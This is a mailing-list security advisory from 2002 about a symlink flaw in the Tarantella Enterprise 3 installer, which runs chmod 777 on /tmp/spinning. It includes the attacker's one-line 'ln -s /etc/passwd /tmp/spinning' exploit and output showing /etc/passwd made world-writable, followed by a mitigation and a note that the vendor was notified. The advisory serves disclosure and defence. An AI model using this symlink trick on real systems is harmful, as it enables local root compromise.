mailing list archives
Another local root vulnerability during installation of Tarantella Enterprise 3.
From: "Larry W. Cashdollar" <lwc () vapid dhs org>
Date: Tue, 19 Feb 2002 08:22:55 -0500 (EST)
-----BEGIN PGP SIGNED MESSAGE-----
Larry W. Cashdollar
Another local root vulnerability during installation of Tarantella
During installation a "twirling / \ | - " text graphic is displayed (you
remember them from the shareware games in DOS days..) they create a file
in /tmp called spinning to determine at what state the installation is at.
The files permissions are changed toread write excute for all, removed and
recreated during different stages of the installation. It is vulnerabile to
a simple symlink attack.
touch /tmp/spinning >/dev/null 2>&1
chmod 777 /tmp/spinning >/dev/null 2>&1
There is no race condition here, just create the link.
[lwc () misery] ln -s /etc/passwd /tmp/spinning
Wait until root is done installing...
[lwc () misery] ls -l /etc/passwd
- -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd
I again recommend the target system is running in single user mode before this
software is installed.
The vendor has been notified and plans to fix this in the next release.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org
-----END PGP SIGNATURE-----
- Another local root vulnerability during installation of Tarantella Enterprise 3. Larry W. Cashdollar (Feb 19)